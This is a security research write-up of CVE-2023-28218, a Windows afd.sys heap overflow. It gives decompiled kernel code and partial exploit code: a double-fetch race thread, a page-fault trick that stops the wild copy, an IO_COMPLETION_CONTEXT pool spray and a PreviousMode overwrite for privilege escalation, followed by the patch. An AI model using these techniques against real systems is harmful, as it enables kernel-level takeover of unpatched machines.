Exploiting Windows Kernel Wild Copy With User Fault Handling (CVE-2023–28218)

At Hexacon 2023, we presented our Windows kernel security research, uncovering CVE-2023-28218, a heap overflow in afd.sys. Read our exploit analysis and methodology.

Frontier Squad

Nov 09, 2023

Contents

Intro Background CVE-2023–28218 Exploitation Patch

Intro

On the 13th and 14th of last month, we had the opportunity to present our research at the Hexacon Conference in Paris, France. The conference was organized by Synacktiv, a French information security company, and is primarily dedicated to the technical aspects of offensive security.

We had a great time at the conference, meeting world-renowned hackers and hearing about their research. Our talk covered Windows kernel security: how we found a vulnerability in the Windows kernel and how we exploited it reliably.

In this post, we take a quick look at the vulnerability covered in the talk and dive a little deeper into the exploit at the code level. The Hexacon team has kindly posted the presentation on YouTube, so if you’re interested, you can watch it here: https://youtu.be/YTyrBnXKrcg?feature=shared

Background

We have been working on this research since the third quarter of last year, with the goal of finding and exploiting vulnerabilities in the Windows kernel. Early on, to keep the analysis efficient, we filtered past CVEs using the method described at the beginning of the presentation and chose the afd.sys (Ancillary Function Driver for WinSock) driver as our main target. After examining past successful exploits against this driver, we found that most of the vulnerabilities were in its DeviceIoControl handling. We therefore analyzed that part of the driver and found that afd.sys implements Fast I/O.

Fast I/O is an alternative path for issuing I/O requests to a device. Normally, an I/O request is delivered as an IRP (I/O Request Packet), but building one requires relatively expensive work in the kernel, such as initializing large objects and allocating system memory. Fast I/O is a fast path that lets the I/O manager call directly into the driver without generating an IRP.

We decided to take a closer look at this path, in the vague hope that previous vulnerability researchers had paid less attention to it. For a device driver to use Fast I/O, it must register a Fast I/O dispatch table separately during driver initialization. The following code shows how the IopXxxControlFile function, which is called by the NtDeviceIoControlFile system call, dispatches to Fast I/O.

__int64 __fastcall IopXxxControlFile(
        int a1,
        HANDLE Handle,
        __int64 a3,
        __int64 a4,
        unsigned __int64 a5,
        unsigned int a6,
        char *inputBuffer,
        size_t inputLength,
        char *outputBuffer,
        SIZE_T outputLength,
        char a11)
{
    ...
    FastIoDispatch = AttachedDevice->DriverObject->FastIoDispatch; // [1]
    if ( FastIoDispatch ) // [2]
    {
        FastIoDeviceControl = FastIoDispatch->FastIoDeviceControl; // [3]
        Irp = FastIoDeviceControl;
        if ( FastIoDeviceControl )
        {
            ...
            v34 = (FastIoDeviceControl)(
                    _fileObj,
                    v29,
                    inputBuffer,
                    inputLength,
                    outputBuffer,
                    outputLength,
                    ioctlCode,
                    &v62,
                    DeviceObject);
            ...

In [1], the function reads the FastIoDispatch table pointer from the DriverObject of the device behind the handle passed to DeviceIoControl. If the table pointer is non-null in [2], it reads the FastIoDeviceControl function pointer from the table in [3] and calls it if it is set. Note that the inputBuffer and outputBuffer pointers supplied by the user are passed to FastIoDeviceControl as is.

Our analysis target, the afd.sys driver, registers FastIoDispatch as shown below.

    memset64(DriverObject->MajorFunction, AfdDispatch, 0x1Cui64);
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = AfdDispatchDeviceControl;
    DriverObject->MajorFunction[IRP_MJ_INTERNAL_DEVICE_CONTROL] = AfdWskDispatchInternalDeviceControl;
    DriverObject->MajorFunction[IRP_MJ_SYSTEM_CONTROL] = &AfdEtwDispatch;
    DriverObject->FastIoDispatch = &AfdFastIoDispatch;

Also, if you look at the AfdFastIoDispatch table, you can see that the FastIoDeviceControl function pointer (AfdFastIoDeviceControl) exists.

.data:00000001C0028160 AfdFastIoDispatch dd 0E0h                 ; SizeOfFastIoDispatch
...
.data:00000001C00281B0                 dq offset AfdFastIoDeviceControl; FastIoDeviceControl

Next, let’s take a look at the vulnerability we found in the target we chose.

CVE-2023–28218

The AfdFastIoDeviceControl function dispatches on the ioctlCode passed as its 7th argument. The vulnerability is in the handling of the 0x120d3 (AfdSendMessage) IOCTL. This IOCTL copies the CMSG buffer passed in by the user into a kernel-format structure, as outlined below.

if ( userBuf )
{
    // [1]
    if ( AfdComputeCMSGLength(userBuf, userBufSize, &cmsgSize) < 0 )
    {
        LOBYTE(ret) = 0;
        goto EXIT;
    }
    LODWORD(userBufSize) = cmsgSize;
    // [2]
    kernelBuf = ExAllocatePoolWithQuotaTag(528, cmsgSize, 0x20646641u);
    // [3]
    LODWORD(err) = AfdCopyCMSGBuffer(kernelBuf, userBuf, userBufSize);
    ...

In [1], the user-passed CMSG Buffer structure is parsed to calculate the size of the CMSG. Then, in [2], kernel memory is allocated for that size, and in [3], the AfdCopyCMSGBuffer function is called to copy the user-passed CMSG Buffer structure into kernel memory.

We first analyzed the AfdComputeCMSGLength function to find out what type of CMSG structure the user should pass in. The following is the pseudo code for the AfdComputeCMSGLength function.

__int64 __fastcall AfdComputeCMSGLength(unsigned int *userBuf, unsigned int userBufSize, _DWORD *pCmsgSize)
{
    unsigned int totalSize; // r9d
    unsigned int chunkSize; // r10d
    unsigned int alignedSize; // eax
    ...
    for ( totalSize = 0; userBufSize >= 0xC; /**/ )
    {
        chunkSize = *userBuf;
        alignedSize = (*userBuf + 3) & 0xFFFFFFFC;
        if ( userBufSize < alignedSize )
            return 0xC000000Di64;
        userBufSize -= alignedSize;
        if ( (userBuf + alignedSize) < userBuf )
            return 0xC000000Di64;
        userBuf = (userBuf + alignedSize);
        ...
        if ( chunkSize < 0xC
          || chunkSize - 12 + 16 < chunkSize - 12
          || totalSize + ((chunkSize - 12 + 23) & 0xFFFFFFF8) < totalSize )
        {
            return 0xC000000Di64;
        }
        totalSize += (chunkSize - 12 + 23) & 0xFFFFFFF8;
    }
    *pCmsgSize = totalSize;
    ...

The AfdComputeCMSGLength function reads chunkSize from the user-supplied pointer userBuf, advances userBuf by chunkSize rounded up to a multiple of 4, and repeats until fewer than 0xC bytes of userBufSize (the size of the user buffer) remain.

With this length calculation algorithm, we can see that a CMSG structure is organized roughly as follows. (pseudo code)

struct chunk {
    unsigned int chunkSize;
    char data[];
};

struct chunk[] CMSG;

The AfdCopyCMSGBuffer function copies the user-supplied CMSG structure into the kernel memory whose size, cmsgSize, was computed by the AfdComputeCMSGLength function.

__int64 __fastcall AfdCopyCMSGBuffer(__int64 kernelBuf, unsigned int *userBuf, unsigned int cmsgSize)
{
    unsigned int sizeRemain;
    __int64 userChunkSize;
    __int64 kernelChunkSize;
    unsigned int alignedChunkSize;
    ...
    while ( 1 )
    {
      userChunkSize = *userBuf;
      ...
      kernelChunkSize = userChunkSize + 4;
      ...
     
      alignedChunkSize = (kernelChunkSize + 7) & 0xFFFFFFF8; // [1]
      if ( sizeRemain < alignedChunkSize ) // [2]
        return 0i64;
      sizeRemain -= alignedChunkSize;
      memmove(kernelBuf + 16, userBuf + 3, userChunkSize - 12);
      ...
    }
    ...

This function also loops, copying each CMSG chunk into kernel memory via memmove. Because the routine converts a CMSG structure passed by a 32-bit user process into its 64-bit kernel layout, it performs an additional alignment operation on the chunk size.

The vulnerability lies in the 8-byte alignment of the kernelChunkSize variable in [1], which can overflow a 32-bit integer. If the user supplies a chunk size between 0xfffffff5 and 0xfffffffb, alignedChunkSize becomes zero and the check in [2] always passes.

Exploitation

With this vulnerability, the overflow can carry arbitrary data because the copied data comes from the user. That leaves two things to consider when exploiting it.

The first is the size of the overflowed chunk. The Windows heap allocator groups allocations into pools by size, so the target object we want to overwrite must be the same size as, or similar in size to, the chunk we overflow. The second is the size of the overflow itself: if we cannot control how many bytes are written, we end up corrupting unrelated data, which makes reliable exploitation difficult.

Let’s look at the first consideration, the size of the overflowed chunk. The chunk size in userBuf that we must manipulate to trigger the vulnerability in AfdCopyCMSGBuffer is also the value AfdComputeCMSGLength uses to calculate the size of the kernel buffer. Since that value has to cause an integer overflow to trigger the vulnerability, allocating a chunk of the desired size seems like a challenge. However, consider the following code again.

if ( userBuf )
{
    // [1]
    if ( AfdComputeCMSGLength(userBuf, userBufSize, &cmsgSize) < 0 )
    {
        LOBYTE(ret) = 0;
        goto EXIT;
    }
    LODWORD(userBufSize) = cmsgSize;
    // [2]
    kernelBuf = ExAllocatePoolWithQuotaTag(528, cmsgSize, 0x20646641u);
    // [3]
    LODWORD(err) = AfdCopyCMSGBuffer(kernelBuf, userBuf, userBufSize);
    ...

The userBuf pointer refers to user-mode memory, whose contents the user can change at any time. Since both AfdComputeCMSGLength and AfdCopyCMSGBuffer read from userBuf, a double fetch occurs: we can change the chunk size stored in userBuf between [1] and [3], so that a heap buffer of a size of our choosing is allocated in [2] while the integer overflow still occurs in [3]. The exploit code takes advantage of the double fetch by flipping the chunk size in userBuf from another thread while calling DeviceIoControl, which triggers the vulnerability, as follows.

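// Chunk size seen by AfdComputeCMSGLength; assumed to be set during CMSG initialization.
static ULONG originalChunkSize;

DWORD WINAPI flippingThread(LPVOID param) {
    volatile ULONG *chunkSize = (volatile ULONG *)param;
    while (1) {
        // Toggle between originalChunkSize and 0xfffffffa.
        *chunkSize ^= (originalChunkSize ^ 0xfffffffa);
    }
    return 0;
}

void trigger() {
    // CMSG initialization DeviceIoControl stuff
}

int main(void) {
    DWORD threadID;
    // ptr2 points at the chunk size field inside userBuf (set up elsewhere).
    HANDLE x = CreateThread(0, 0, flippingThread, ptr2, 0, &threadID);
    trigger();
    return 0;
}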

The next thing to consider is the size of the overflow.

      ...
      userChunkSize = *userBuf;
      ...
      kernelChunkSize = userChunkSize + 4;
      ...
      alignedChunkSize = (kernelChunkSize + 7) & 0xFFFFFFF8; // [1]
      ...
      memmove(kernelBuf + 16, userBuf + 3, userChunkSize - 12);

In the AfdCopyCMSGBuffer function, the length passed to memmove is userChunkSize - 12, which can only be a value between 0xffffffe9 and 0xffffffef, because userChunkSize + 4 + 7 in [1] must overflow a 4-byte integer. Such wild copies are generally known to be very difficult to exploit, so we needed a way to abort the copy partway.

We noted that the source buffer of this kernel memmove is a user-mode pointer. The Windows kernel has no SMAP protection, so it can access user memory directly, and to keep a page fault on user memory from crashing the kernel, the access is wrapped in a __try/__except block, as shown below.

PAGE:00000001C003458E                 call    AfdCopyCMSGBuffer
PAGE:00000001C0034593                 mov     dword ptr [rsp+398h+err], eax
PAGE:00000001C0034597                 test    eax, eax
PAGE:00000001C0034599                 jns     short loc_1C00345A6
PAGE:00000001C003459B                 xor     bl, bl
PAGE:00000001C003459D                 mov     [rsp+398h+var_348], bl
PAGE:00000001C00345A1                 jmp     loc_1C003354E
PAGE:00000001C00345A6 ; ---------------------------------------------------------------------------
PAGE:00000001C00345A6
PAGE:00000001C00345A6 loc_1C00345A6:                          ; CODE XREF: AfdFastIoDeviceControl+1519↑j
PAGE:00000001C00345A6                 mov     r13, [rsp+398h+kernelBuf]
PAGE:00000001C00345AE                 mov     [rsp+398h+var_308], r13
PAGE:00000001C00345B6                 mov     edx, [rsp+398h+var_298+8]
PAGE:00000001C00345BD                 jmp     short loc_1C00345CA
PAGE:00000001C00345BD ;     } // starts at 1C003453F
PAGE:00000001C00345BF ; ---------------------------------------------------------------------------
PAGE:00000001C00345BF
PAGE:00000001C00345BF loc_1C00345BF:                          ; DATA XREF: .rdata:00000001C0022668↑o
PAGE:00000001C00345BF ;   __except(1) // owned by 1C003453F
PAGE:00000001C00345BF                 xor     bl, bl

We can use this to stop the wild copy during the exploit: we intentionally leave the memory right after userBuf unmapped and place userBuf so that only the number of bytes we want to copy lies before the unmapped region. When memmove reaches the unmapped page, the resulting fault is caught by the exception handler and the copy ends. This can be easily implemented by using VirtualAlloc as follows.

BYTE *ptr = VirtualAlloc((PVOID)0x12340000, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
BYTE *userBuf = (BYTE *)0x12340000 + 0x1000 - copyBytes;

Now we can allocate a chunk of any size and overflow it by any number of bytes we want. The next step is deciding which data to overwrite. Drawing on the talk Synacktiv presented in 2021, “Discovering and exploiting a kernel pool overflow on modern Windows 10”, we wanted to create an arbitrary decrement primitive, because a medium-integrity process on Windows can still obtain the address of a kernel thread object, and manipulating the thread object’s PreviousMode value can bypass all of the kernel’s permission checks, including those on memory access.

To do this, we needed to find an object that was sprayable and allowed arbitrary decrement when some member was overwritten. The object we found was IO_COMPLETION_CONTEXT, whose members are shown below.

//0x18 bytes (sizeof)
struct _IO_COMPLETION_CONTEXT
{
    VOID* Port;         //0x0
    VOID* Key;          //0x8
    VOID* UsageCount;   //0x10
};

First, the user can allocate and free IO_COMPLETION_CONTEXT objects at will through the NtSetInformationFile system call, which makes the object sprayable. Let’s look at the NtSetInformationFile code that allocates and frees IO_COMPLETION_CONTEXT. The object is allocated as shown below.

case FileCompletionInformation:
    ...
    // [1]
    Status = ObReferenceObjectByHandle(hdl, 2u, IoCompletionObjectType, v73, &Object, 0i64);
    if ( Status >= 0 )
    {
      // [2]
      PoolWithTag = (_IO_COMPLETION_CONTEXT *)ExAllocatePoolWithTag(NonPagedPoolNx, 0x18ui64, 0x63436F49u);
      if ( PoolWithTag )
      {
        v53 = KeAcquireSpinLockRaiseToDpc(&FileObject->IrpListLock);
        if ( FileObject->CompletionContext )
        {
          ...
        }
        else
        {
          FileObject->Flags &= ~0x400u;
          // [3]
          PoolWithTag->Port = Object;
          PoolWithTag->Key = v50[1];
          PoolWithTag->UsageCount = 0i64;
          FileObject->CompletionContext = PoolWithTag;

We can allocate the object by passing FileCompletionInformation as the FileInformationClass argument to the NtSetInformationFile system call. The allocation path first obtains the IoCompletion object for the given handle in [1] and allocates memory for the IO_COMPLETION_CONTEXT object in [2]. Next, the function initializes the object members in [3], where you can see that it stores the object pointer in the Port member.

And here is the code that releases the IO_COMPLETION_CONTEXT object.

case FileReplaceCompletionInformation:
    ...
    v56 = FileObject;
    if ( FileObject->CompletionContext )
    {
        ...
        // [1]
        Status = IopReplaceCompletionPort(v56, v55, v54.MasterIrp->MdlAddress);

Passing FileReplaceCompletionInformation as the value of the FileInformationClass argument to the NtSetInformationFile system call calls the IopReplaceCompletionPort function with the file object given as an argument.

__int64 __fastcall IopReplaceCompletionPort(PFILE_OBJECT a1, void *a2, void *a3)
{
  ...
  p_IrpListLock = &a1->IrpListLock;
  v7 = -1073741823;
  v8 = KeAcquireSpinLockRaiseToDpc(&a1->IrpListLock);
  CompletionContext = a1->CompletionContext;
  v10 = v8;
  if ( CompletionContext && a1->IrpList.Flink == &a1->IrpList && !CompletionContext->UsageCount )
  {
    ObfDereferenceObjectWithTag(CompletionContext->Port, 0x746C6644u);

The IopReplaceCompletionPort function takes the CompletionContext object from the file object and dereferences the object that its Port member points to, which decrements that object’s reference count. If we use the overflow to overwrite the Port member of a sprayed IO_COMPLETION_CONTEXT object with an address of our choosing and then release that object through FileReplaceCompletionInformation, the kernel treats the address as an object and decrements the value it takes to be the reference count by one. This gives us the arbitrary decrement primitive.

In C, spraying an IO_COMPLETION_CONTEXT object would look like this:

void CreateCompletionObject(PIPE_HANDLES* out) {
    PIPE_HANDLES pp;
    CreatePipeWrapper(&pp);
    IO_STATUS_BLOCK io;
    DWORD64 input[2];
    input[0] = (DWORD64)hiocom;
    input[1] = (DWORD64)0x41414141;
    int ret1, ret2;
    ret1 = NtSetInformationFile(pp.w, &io, (PVOID)input, 0x10, (FILE_INFORMATION_CLASS)0x1E);
    ret2 = NtSetInformationFile(pp.r, &io, (PVOID)input, 0x10, (FILE_INFORMATION_CLASS)0x1E);
    out->w = pp.w;
    out->r = pp.r;
}
    
void sprayCompletionContexts() {
    NtCreateIoCompletion(&hiocom, GENERIC_ALL, NULL, 0);
    // spray IO_COMPLETION_CONTEXT
    for (int i = 0; i < SPRAYSIZE; i++) {
        CreateCompletionObject(&spray[i]);
    }
}

The object can be released simply by calling the CloseHandle API on the handles obtained through CreateCompletionObject.

The exploit is then finalized by using the decrement primitive to lower the current thread’s PreviousMode (thread + 0x232) from 1 (UserMode) to 0 (KernelMode), after which the kernel treats system calls from that thread as if they came from kernel mode.

Patch

The patch replaces the raw integer operations in AfdComputeCMSGLength and AfdCopyCMSGBuffer with checked wrapper functions that detect integer overflow.

__int64 __fastcall AfdCopyCMSGBuffer(size_t *pResult, size_t a2, ULONG *a3, ULONG a4)
{
    ...
    if ( RtlULongSub(userChunkSize, 0xCu, &v14) < 0 )
      break;
    copyBytes = v14;
    if ( RtlSizeTAdd(v14, 0x10ui64, kernelBuf) < 0
      || (int)RtlSizeTAlignUp(*kernelBuf, 16i64, &Subtrahend) < 0
      || RtlSizeTSub(Minuend, Subtrahend, &Minuend) < 0 )
    {
      break;
    }
    ...
    memmove(kernelBuf + 2, userBuf, copyBytes);
    ...
}